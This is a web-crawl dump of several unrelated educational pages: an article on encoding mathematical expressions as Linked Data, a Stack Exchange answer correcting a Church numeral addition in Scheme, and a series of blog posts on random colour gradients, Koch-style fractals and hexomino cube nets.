"Now some hexominoes will always cover an odd number of black and white squares — let’s call those odd hexominoes. The others — even hexominoes — cover an even number of black and white squares. As it turns out, there are 24 odd hexominoes and 11 even hexominoes. This means that any placement of all the hexominoes on a checkerboard will cover an even number of white squares and an even number of black squares.\n\nHowever, any rectangle of 210 = 6 x 35 hexominoes must cover 105 white squares and 105 black squares — both odd numbers of squares. But we just saw that’s not possible — an even number of each must be covered. So no rectangles. This is an example of a parity argument, by the way, and is a standard tool when proving results about covering figures with polyominoes.\n\nTo overcome this difficulty, I threw in 6 additional unit squares so I could make a 12 x 18 rectangle — and to my surprise, I found out that the flag of Thailand has dimensions 2:3 as well. You can read more about this by clicking on “the flag of thailand” on the page referenced above — and see that the tiling problem can be solved with a little wiggle room. But no computer here — I cut out a set of paper hexominoes and designed the flag of Thailand by hand…."
] | [
null,
"https://vincematsko.files.wordpress.com/2015/11/day011evaporation2bweb.png",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/11/day012linear.png",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/11/day012quadratic.png",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/11/day012root.png",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/11/day011evaporation2bweb.png",
null,
"https://vincematsko.files.wordpress.com/2015/11/day011evap1.png",
null,
"https://vincematsko.files.wordpress.com/2015/11/dao011evap2.png",
null,
"https://vincematsko.files.wordpress.com/2015/11/day011texture21.png",
null,
"https://vincematsko.files.wordpress.com/2015/10/day009koch090-150.jpg",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/10/day009koch090-110.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/10/day009koch011-191.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/10/day008koch80-140.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/10/day008fractal33.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/10/day008fractal65.jpg",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/09/day007koch11.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day007koch21.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day007koch3.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day007koch4.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day004hexominoes.png",
null,
"https://vincematsko.files.wordpress.com/2015/09/day004backhex.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day004evenodd.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.91749096,"math_prob":0.9155588,"size":5186,"snap":"2021-31-2021-39","text_gpt3_token_len":1097,"char_repetition_ratio":0.11134697,"word_repetition_ratio":0.01724138,"special_character_ratio":0.21075974,"punctuation_ratio":0.09012464,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97541267,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112],"im_url_duplicate_count":[null,null,null,null,null,9,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,9,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,9,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,2,null,2,null,2,null,10,null,null,null,10,null,10,null,null,null,null,null,null,null,null,null,9,null,9,null,9,null,9,null,8,null,8,null,8,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T20:44:42Z\",\"WARC-Record-ID\":\"<urn:uuid:d343d6df-63ea-47a8-92b1-62072bcd5e1b>\",\"Content-Length\":\"139366\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d1542692-7014-422d-91a5-79ba8ebcd393>\",\"WARC-Concurrent-To\":\"<urn:uuid:c7fd2cb7-ff6e-46dd-9420-bd42d65e7320>\",\"WARC-IP-Address\":\"192.0.78.25\",\"WARC-Target-URI\":\"https://cre8math.com/category/geometry-2d/page/5/\",\"WARC-Payload-Digest\":\"sha1:TOWTD44MK5RDP55TGR6BXEPKGAWCNORB\",\"WARC-Block-Digest\":\"sha1:7RPRUQEKCIVC2XG7CC6MSFVFABMQUWMJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153791.41_warc_CC-MAIN-20210728185528-20210728215528-00009.warc.gz\"}"} |
https://crypto.stackexchange.com/questions/34766/how-secure-is-this-logarithmic-encryption-algorithm?noredirect=1 | [
"# How secure is this logarithmic encryption algorithm?\n\nHow secure would the following logarithmic encryption algorithm be when tested under the same conditions as high end encryption algorithms (AES, RSA etc...).\n\nNote: For smaller text the text will be padded to form a minimum length of 1024 bits.\n\nFor encryption:\n1. Generate random numbers as same length as the message. R = [5, 13]\n2. Turn message characters into ordinal numbers. M = [97, 98]\n3. Encryption algorithm is as follows: M^x = R; to solve this: x = log(R)/log(M)\n\nFor decryption:\n1. To find the original ordinal number again: M = x_sqrt(R, x); x_sqrt is to find the nth_root of a number, where R is the the radicand and x is index.\n\nExample:\nR = \nM = \n\nEncryption:\nM^x = R\n: 98^x = 13\n: x = log(13) / log(98)\n: x = 0.559425856\n\nDecryption:\nM = x_sqrt(R, x)\n: M = x_sqrt(13, 0.559425856)\n: M = 98\n\n• Well - seems you have to learn a lot yet. It works another way around. you have to (mathematically) proof your algorithm is secure (you can design a system that you cannot break, but difficult that nobody can break). I immediately see at least two ways how to completely break the encryption. E.g. having the x as whole number it reveals a lot about the key and the plaintext. As well - you are using a simple log function (not discrete), otherwise you wouldn't able to decrypt (when properly done). I suggest you to read about the cryptography or follow some course first to get some real basics. – gusto2 Apr 22 '16 at 10:17\n• If you have small keys then brute forcing is always an option. Key size should not be related to message size. If that would be the case, how would you encrypt small messages? – Maarten Bodewes Apr 22 '16 at 10:38\n• @GabrielVince The x isn't a whole number. It's a fraction. – MrCyber Apr 22 '16 at 10:46\n• @MaartenBodewes The idea was to pad a message to a certain length, say the minimum length would be 1024 bits? – MrCyber Apr 22 '16 at 10:47\n• Fractions and certainly floats are pretty tricky because of rounding errors and suchlike. There is a good reason why almost all cryptographic functions work with (positive) integers instead. @MrCyber I didn't see any mention of padding or hybrid cryptography (which may be needed for larger plaintext?) in the question. – Maarten Bodewes Apr 22 '16 at 10:49\n\nI'll assume R is secret, and is the key; and the ciphertext is given as a list of values x in decimal, as in the example given x = 0.559425856.\n\nThis is totally insecure: even without knowledge of R, it is trivial to reduce candidate plaintext letters to almost nothing, just by knowing the corresponding x. e.g. if we assume R is an integer in range [2..127], and x = 0.559425856, the only pair (R,M) possible is (13,98). That can be seen by tabulating x by increasing values as follows\n\n x R M\n0.557913767 10 62\n0.558189871 13 99\n0.558248536 14 113\n0.558830625 9 51\n0.558890092 11 73\n0.559030886 15 127\n0.559300193 14 112\n0.559329667 12 85\n0.559425856 13 98\n0.559944654 15 126\n0.559957234 8 41\n0.560120590 10 61\n0.560365305 14 111\n0.560680089 13 97\n0.560692653 11 72\n0.560823605 12 84\n0.560868731 15 125\n0.561444177 14 110\n\n\nThe problem can NOT be fully fixed by giving just enough decimals of x to allows decryption (here, x = 0.559 would do if we round to the nearest), for that still allows to reduce the possibilities in the plaintext a lot.\n\nA lesser problem is that if the plaintext gets known, it is trivial to find R. Hence R can not be reused for different plaintexts. 
Hence this is not a cipher by the modern definition of the term, which requires that there's a key reusable for several messages. That also makes use of the system impractical, as the OTP is; but at least that one is secure.\n\nAlso, the ciphertext is larger than the plaintext; another problem that the OTP does not have.\n\n• What will the effect be if we make R a fraction of any value? Will that to some degree increase the strength of the algorithm? – MrCyber Apr 22 '16 at 12:10\n• @MrCyber: if R had enough decimals, that would markedly improve, but not fully fix, the total insecurity that we have now (the minimum and maximum for R will remain a weakness allowing sizable information about M to leak from x). That would also markedly increase the size of R, which is a serious problem since we need to move R secretly to the receiver side. – fgrieu Apr 22 '16 at 13:38"
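A short sketch of the recovery the answer describes — given one ciphertext value x, enumerate the (R, M) pairs consistent with it (the ranges and tolerance are illustrative):

```python
def candidates(x, r_max=127, tol=1e-3):
    # invert x = log(R)/log(M): M = R**(1/x), then keep near-integer M in ASCII range
    found = []
    for r in range(2, r_max + 1):
        m = r ** (1.0 / x)
        m_int = round(m)
        if 32 <= m_int <= 126 and abs(m - m_int) < tol:
            found.append((r, m_int))
    return found

print(candidates(0.559425856))   # [(13, 98)]
```

With the example value from the question, only the pair (13, 98) survives, matching the table above.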
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8069963,"math_prob":0.9818232,"size":811,"snap":"2020-24-2020-29","text_gpt3_token_len":248,"char_repetition_ratio":0.133829,"word_repetition_ratio":0.0,"special_character_ratio":0.35881627,"punctuation_ratio":0.20108695,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934181,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-27T06:47:56Z\",\"WARC-Record-ID\":\"<urn:uuid:6b1db9f7-72d9-4160-9ab6-08565ef18907>\",\"Content-Length\":\"153053\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:752e181c-2f4a-489b-9714-8eab03023149>\",\"WARC-Concurrent-To\":\"<urn:uuid:0566c8b0-1c47-4003-b74c-43a7631d1c43>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/34766/how-secure-is-this-logarithmic-encryption-algorithm?noredirect=1\",\"WARC-Payload-Digest\":\"sha1:CBHFZ4A6MZR7RTZSKJCMJXOHRQVFYM46\",\"WARC-Block-Digest\":\"sha1:GEMBAWBJRPOMMDJGUNMNVDB3AMITXDKG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347392141.7_warc_CC-MAIN-20200527044512-20200527074512-00281.warc.gz\"}"} |
https://scribesoftimbuktu.com/find-the-distance-between-two-points-51-111/ | [
"# Find the Distance Between Two Points (5,1) , (11,1)",
null,
"(5,1) , (11,1)\nUse the distance formula to determine the distance between the two points.\nDistance=(x2-x1)2+(y2-y1)2\nSubstitute the actual values of the points into the distance formula.\n(11-5)2+(1-1)2\nSimplify.\nSubtract 5 from 11.\n62+(1-1)2\nRaise 6 to the power of 2.\n36+(1-1)2\nSubtract 1 from 1.\n36+02\nRaising 0 to any positive power yields 0.\n36+0\nAdd 36 and 0.\n36\nRewrite 36 as 62.\n62\nPull terms out from under the radical, assuming positive real numbers.\n6\n6\nFind the Distance Between Two Points (5,1) , (11,1)\n\n### Solving MATH problems\n\nWe can solve all math problems. Get help on the web or with our math app\n\nScroll to top"
] | [
null,
"https://scribesoftimbuktu.com/wp-content/uploads/ask60.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.7061217,"math_prob":0.9986752,"size":515,"snap":"2022-40-2023-06","text_gpt3_token_len":184,"char_repetition_ratio":0.14285715,"word_repetition_ratio":0.0,"special_character_ratio":0.38640776,"punctuation_ratio":0.13492064,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9971772,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-07T02:25:00Z\",\"WARC-Record-ID\":\"<urn:uuid:7d063fc8-8704-4efd-9238-78bf130de824>\",\"Content-Length\":\"73726\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:690cff58-6d74-4e39-8cd3-25deec5fb7ad>\",\"WARC-Concurrent-To\":\"<urn:uuid:085e53d8-49cd-4d03-af10-f2f13f62fcfb>\",\"WARC-IP-Address\":\"107.167.10.237\",\"WARC-Target-URI\":\"https://scribesoftimbuktu.com/find-the-distance-between-two-points-51-111/\",\"WARC-Payload-Digest\":\"sha1:ENLXYKVOL6HZDG53UNNJZFRUQMVIGZUD\",\"WARC-Block-Digest\":\"sha1:OZLURJGD3KGTFWOB5XOLE7KMCNDS5DUN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337906.7_warc_CC-MAIN-20221007014029-20221007044029-00094.warc.gz\"}"} |
https://www.tutorialspoint.com/how-to-convert-rgb-image-to-hsv-using-java-opencv-library | [
"# How to convert RGB image to HSV using Java OpenCV library?\n\nThe cvtColor() method of the Imgproc class changes/converts the color of the image from one to another. This method accepts three parameters −\n\n• src − A Matrix object representing source.\n\n• dst − A Matrix object representing the destination.\n\n• code − An integer value representing the color of the destination image.\n\nTo convert an RGB image to HSV you need to pass Imgproc.COLOR_RGB2HSV as the third parameter to this method.\n\n## Example\n\nimport org.opencv.core.Core;\nimport org.opencv.core.Mat;\nimport org.opencv.imgcodecs.Imgcodecs;\nimport org.opencv.imgproc.Imgproc;\npublic class RGB2HSV {\npublic static void main(String args[]) throws Exception {\n//Creating the empty destination matrix\nMat dst = new Mat();\n//Converting the image to gray scale\nImgproc.cvtColor(src, dst, Imgproc.COLOR_RGB2HSV);\n//Instantiating the Imagecodecs class\nImgcodecs imageCodecs = new Imgcodecs();\n//Writing the image\nimageCodecs.imwrite(\"D:\\images\\colorTOhsv.jpg\", dst);\nSystem.out.println(\"Image Saved\");\n}\n}\n\n## Input",
null,
"## Output",
null,
""
] | [
null,
"https://www.tutorialspoint.com/assets/questions/media/37103/rgb_image.jpg",
null,
"https://www.tutorialspoint.com/assets/questions/media/37103/rgb_image1.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.62281567,"math_prob":0.4463114,"size":2753,"snap":"2022-40-2023-06","text_gpt3_token_len":653,"char_repetition_ratio":0.22189887,"word_repetition_ratio":0.19724771,"special_character_ratio":0.22629859,"punctuation_ratio":0.12684989,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9596225,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-04T12:16:48Z\",\"WARC-Record-ID\":\"<urn:uuid:c7bd1252-2d8d-4151-87df-211793c910c3>\",\"Content-Length\":\"43432\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8a3bbe0d-0eeb-4845-b0b7-28bcab8db25e>\",\"WARC-Concurrent-To\":\"<urn:uuid:498000d9-7a60-42a1-a562-466e9742fcc7>\",\"WARC-IP-Address\":\"192.229.210.176\",\"WARC-Target-URI\":\"https://www.tutorialspoint.com/how-to-convert-rgb-image-to-hsv-using-java-opencv-library\",\"WARC-Payload-Digest\":\"sha1:AC7DWXPHUYEN22IXGDGBQAG3CQLSJJYE\",\"WARC-Block-Digest\":\"sha1:A7D5ZCBUMVXTUHG6FDOWISOP7ND455F3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500126.0_warc_CC-MAIN-20230204110651-20230204140651-00224.warc.gz\"}"} |
https://arxiv.org/abs/1610.09051 | [
"math.ST\n\nTitle:The Geometry of Synchronization Problems and Learning Group Actions\n\nAbstract: We develop a geometric framework that characterizes the synchronization problem --- the problem of consistently registering or aligning a collection of objects. The theory we formulate characterizes the cohomological nature of synchronization based on the classical theory of fibre bundles. We first establish the correspondence between synchronization problems in a topological group $G$ over a connected graph $\\Gamma$ and the moduli space of flat principal $G$-bundles over $\\Gamma$, and develop a discrete analogy of the renowned theorem of classifying flat principal bundles with fix base and structural group using the representation variety. In particular, we show that prescribing an edge potential on a graph is equivalent to specifying an equivalence class of flat principal bundles, of which the triviality of holonomy dictates the synchronizability of the edge potential. We then develop a twisted cohomology theory for associated vector bundles of the flat principal bundle arising from an edge potential, which is a discrete version of the twisted cohomology in differential geometry. This theory realizes the obstruction to synchronizability as a cohomology group of the twisted de Rham cochain complex. We then build a discrete twisted Hodge theory --- a fibre bundle analog of the discrete Hodge theory on graphs --- which geometrically realizes the graph connection Laplacian as a Hodge Laplacian of degree zero. Motivated by our geometric framework, we study the problem of learning group actions --- partitioning a collection of objects based on the local synchronizability of pairwise correspondence relations. A dual interpretation is to learn finitely generated subgroups of an ambient transformation group from noisy observed group elements. A synchronization-based algorithm is also provided, and we demonstrate its efficacy using simulations and real data.\n Comments: 43 pages, 6 figures. To appear in Discrete \\& Computational Geometry Subjects: Statistics Theory (math.ST); Computational Geometry (cs.CG) MSC classes: 05C50, 62-07, 57R22, 58A14 ACM classes: I.2.6; F.2.2 Cite as: arXiv:1610.09051 [math.ST] (or arXiv:1610.09051v3 [math.ST] for this version)\n\nSubmission history\n\nFrom: Tingran Gao [view email]\n[v1] Fri, 28 Oct 2016 01:20:52 UTC (3,942 KB)\n[v2] Sun, 7 Apr 2019 03:46:08 UTC (3,657 KB)\n[v3] Tue, 14 May 2019 03:51:35 UTC (4,373 KB)"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.84281653,"math_prob":0.91511595,"size":2374,"snap":"2019-43-2019-47","text_gpt3_token_len":499,"char_repetition_ratio":0.11476793,"word_repetition_ratio":0.0,"special_character_ratio":0.21187869,"punctuation_ratio":0.095,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97228354,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-23T00:32:42Z\",\"WARC-Record-ID\":\"<urn:uuid:348a184a-6975-4e8f-b787-535dbb63b439>\",\"Content-Length\":\"21778\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6e3a6ec5-792f-49c9-b1bc-381ec8137587>\",\"WARC-Concurrent-To\":\"<urn:uuid:8d3e8b25-cabf-4be4-8621-624d1a032e6e>\",\"WARC-IP-Address\":\"128.84.21.199\",\"WARC-Target-URI\":\"https://arxiv.org/abs/1610.09051\",\"WARC-Payload-Digest\":\"sha1:6DPTNYMMLVFJ3O5F6VJJ4DFRTRZQ4SWX\",\"WARC-Block-Digest\":\"sha1:5UTQELXAAPP7PQYIN6NQEYQ7ODZ33EGS\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987826436.88_warc_CC-MAIN-20191022232751-20191023020251-00251.warc.gz\"}"} |
https://stat.ethz.ch/pipermail/r-help/2018-December/461020.html | [
"# [R] SE for all fixed factor effect in GLMM\n\nHeinz Tuechler tuechler @ending from gmx@@t\nSun Dec 30 08:58:09 CET 2018\n\n```maybe qvcalc https://cran.r-project.org/web/packages/qvcalc/index.html\nis useful for you.\n\nMarc Girondot via R-help wrote/hat geschrieben on/am 30.12.2018 05:31:\n> Dear members,\n>\n> Let do a example of simple GLMM with x and G as fixed factors and R as\n> random factor:\n>\n> (note that question is the same with GLM or even LM):\n>\n> x <- rnorm(100)\n> y <- rnorm(100)\n> G <- as.factor(sample(c(\"A\", \"B\", \"C\", \"D\"), 100, replace = TRUE))\n> R <- as.factor(rep(1:25, 4))\n>\n> library(lme4)\n>\n> m <- lmer(y ~ x + G + (1 | R))\n> summary(m)\\$coefficients\n>\n> I get the fixed effect fit and their SE\n>\n>> summary(m)\\$coefficients\n> Estimate Std. Error t value\n> (Intercept) 0.07264454 0.1952380 0.3720820\n> x -0.02519892 0.1238621 -0.2034433\n> GB 0.10969225 0.3118371 0.3517614\n> GC -0.09771555 0.2705523 -0.3611706\n> GD -0.12944760 0.2740012 -0.4724344\n>\n> The estimate for GA is not shown as it is fixed to 0. Normal, it is the\n> reference level.\n>\n> But is there a way to get SE for GA of is-it non-sense question because\n> GA is fixed to 0 ?\n>\n> ______________\n>\n> I propose here a solution but I don't know if it is correct. It is based\n> on reordering levels and averaging se for all reordering:\n>\n> G <- relevel(G, \"A\")\n> m <- lmer(y ~ x + G + (1 | R))\n> sA <- summary(m)\\$coefficients\n>\n> G <- relevel(G, \"B\")\n> m <- lmer(y ~ x + G + (1 | R))\n> sB <- summary(m)\\$coefficients\n>\n> G <- relevel(G, \"C\")\n> m <- lmer(y ~ x + G + (1 | R))\n> sC <- summary(m)\\$coefficients\n>\n> G <- relevel(G, \"D\")\n> m <- lmer(y ~ x + G + (1 | R))\n> sD <- summary(m)\\$coefficients\n>\n> seA <- mean(sB[\"GA\", \"Std. Error\"], sC[\"GA\", \"Std. Error\"], sD[\"GA\",\n> \"Std. Error\"])\n> seB <- mean(sA[\"GB\", \"Std. Error\"], sC[\"GB\", \"Std. Error\"], sD[\"GB\",\n> \"Std. Error\"])\n> seC <- mean(sA[\"GC\", \"Std. Error\"], sB[\"GC\", \"Std. Error\"], sD[\"GC\",\n> \"Std. Error\"])\n> seD <- mean(sA[\"GD\", \"Std. Error\"], sB[\"GD\", \"Std. Error\"], sC[\"GD\",\n> \"Std. Error\"])\n>\n> seA; seB; seC; seD\n>\n>\n> Thanks,\n>\n> Marc\n>\n> ______________________________________________\n> R-help using r-project.org mailing list -- To UNSUBSCRIBE and more, see\n> https://stat.ethz.ch/mailman/listinfo/r-help"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.61432225,"math_prob":0.849771,"size":2435,"snap":"2021-31-2021-39","text_gpt3_token_len":857,"char_repetition_ratio":0.15261209,"word_repetition_ratio":0.12731482,"special_character_ratio":0.45462012,"punctuation_ratio":0.19029126,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9956723,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-31T23:24:20Z\",\"WARC-Record-ID\":\"<urn:uuid:30c39436-68ae-4fd4-b8ac-9327f3721fe2>\",\"Content-Length\":\"6576\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:991da3f5-553f-46dc-a818-2e49d8407f3b>\",\"WARC-Concurrent-To\":\"<urn:uuid:29d8c76d-118f-4559-8eb9-733ec1f3561a>\",\"WARC-IP-Address\":\"129.132.119.195\",\"WARC-Target-URI\":\"https://stat.ethz.ch/pipermail/r-help/2018-December/461020.html\",\"WARC-Payload-Digest\":\"sha1:7T7ONQ3HRIDOXGNCGL7YSJGDZ5CCZVDW\",\"WARC-Block-Digest\":\"sha1:A2VDAJ7Z5FJ3ELDIJH6LXHXCJ4TDZ7KR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154126.73_warc_CC-MAIN-20210731203400-20210731233400-00512.warc.gz\"}"} |
https://nl.mathworks.com/help/stats/surrogate-splits-for-missing-data.html | [
"Documentation\n\n## Surrogate Splits\n\nWhen the value of the optimal split predictor for an observation is missing, if you specify to use surrogate splits, the software sends the observation to the left or right child node using the best surrogate predictor. When you have missing data, trees and ensembles of trees with surrogate splits give better predictions. This example shows how to improve the accuracy of predictions for data with missing values by using decision trees with surrogate splits.\n\nLoad the `ionosphere` data set.\n\n`load ionosphere`\n\nPartition the data set into training and test sets. Hold out 30% of the data for testing.\n\n```rng('default') % For reproducibility cv = cvpartition(Y,'Holdout',0.3);```\n\nIdentify the training and testing data.\n\n```Xtrain = X(training(cv),:); Ytrain = Y(training(cv)); Xtest = X(test(cv),:); Ytest = Y(test(cv));```\n\nSuppose half of the values in the test set are missing. Set half of the values in the test set to `NaN`.\n\n`Xtest(rand(size(Xtest))>0.5) = NaN;`\n\n### Train Random Forest\n\nTrain a random forest of 150 classification trees without surrogate splits.\n\n```templ = templateTree('Reproducible',true); % For reproducibility of random predictor selections Mdl = fitcensemble(Xtrain,Ytrain,'Method','Bag','NumLearningCycles',150,'Learners',templ);```\n\nCreate a decision tree template that uses surrogate splits. A tree using surrogate splits does not discard the entire observation when it includes missing data in some predictors.\n\n`templS = templateTree('Surrogate','On','Reproducible',true);`\n\nTrain a random forest using the template `templS`.\n\n`Mdls = fitcensemble(Xtrain,Ytrain,'Method','Bag','NumLearningCycles',150,'Learners',templS);`\n\n### Test Accuracy\n\nTest the accuracy of predictions with and without surrogate splits.\n\nPredict responses and create confusion matrix charts using both approaches.\n\n```Ytest_pred = predict(Mdl,Xtest); figure cm = confusionchart(Ytest,Ytest_pred); cm.Title = 'Model Without Surrogates';```",
null,
"```Ytest_preds = predict(Mdls,Xtest); figure cms = confusionchart(Ytest,Ytest_preds); cms.Title = 'Model with Surrogates';```",
null,
"All off-diagonal elements on the confusion matrix represent misclassified data. A good classifier yields a confusion matrix that looks dominantly diagonal. In this case, the classification error is lower for the model trained with surrogate splits.\n\nEstimate cumulative classification errors. Specify `'Mode','Cumulative'` when estimating classification errors by using the `loss` function. The `loss` function returns a vector in which element `J` indicates the error using the first `J` learners.\n\n```figure plot(loss(Mdl,Xtest,Ytest,'Mode','Cumulative')) hold on plot(loss(Mdls,Xtest,Ytest,'Mode','Cumulative'),'r--') legend('Trees without surrogate splits','Trees with surrogate splits') xlabel('Number of trees') ylabel('Test classification error')```",
null,
"The error value decreases as the number of trees increases, which indicates good performance. The classification error is lower for the model trained with surrogate splits.\n\nCheck the statistical significance of the difference in results with by using `compareHoldout`. This function uses the McNemar test.\n\n`[~,p] = compareHoldout(Mdls,Mdl,Xtest,Xtest,Ytest,'Alternative','greater')`\n```p = 0.1051 ```\n\nThe low p-value indicates that the ensemble with surrogate splits is better in a statistically significant manner.\n\n### Estimate Predictor Importance\n\nPredictor importance estimates can vary depending on whether or not a tree uses surrogate splits. After estimating predictor importance, you can exclude unimportant predictors and train a model again. Eliminating unimportant predictors saves time and memory for predictions, and makes predictions easier to understand.\n\nEstimate predictor importance measures by permuting out-of-bag observations. Then, find the five most important predictors.\n\n```imp = oobPermutedPredictorImportance(Mdl); [~,ind] = maxk(imp,5)```\n```ind = 1×5 3 5 27 7 8 ```\n```imps = oobPermutedPredictorImportance(Mdls); [~,inds] = maxk(imps,5)```\n```inds = 1×5 5 3 7 27 8 ```\n\nThe five most important predictors are the same, but the orders of importance are different.\n\nIf the training data includes many predictors and you want to analyze predictor importance, then specify `'NumVariablesToSample'` of the `templateTree` function as `'all'` for the tree learners of the ensemble. Otherwise, the software might not select some predictors, underestimating their importance. For an example, see Select Predictors for Random Forests."
] | [
null,
"https://nl.mathworks.com/help/examples/stats/win64/SurrogateSplitsExample_01.png",
null,
"https://nl.mathworks.com/help/examples/stats/win64/SurrogateSplitsExample_02.png",
null,
"https://nl.mathworks.com/help/examples/stats/win64/SurrogateSplitsExample_03.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.70883286,"math_prob":0.9461111,"size":4334,"snap":"2019-43-2019-47","text_gpt3_token_len":970,"char_repetition_ratio":0.14618938,"word_repetition_ratio":0.038596492,"special_character_ratio":0.21019843,"punctuation_ratio":0.16069058,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9764063,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-20T11:29:04Z\",\"WARC-Record-ID\":\"<urn:uuid:b85ff18e-5211-4269-bb4e-b8111d7d5582>\",\"Content-Length\":\"74177\",\"Content-Type\":\"application/http; 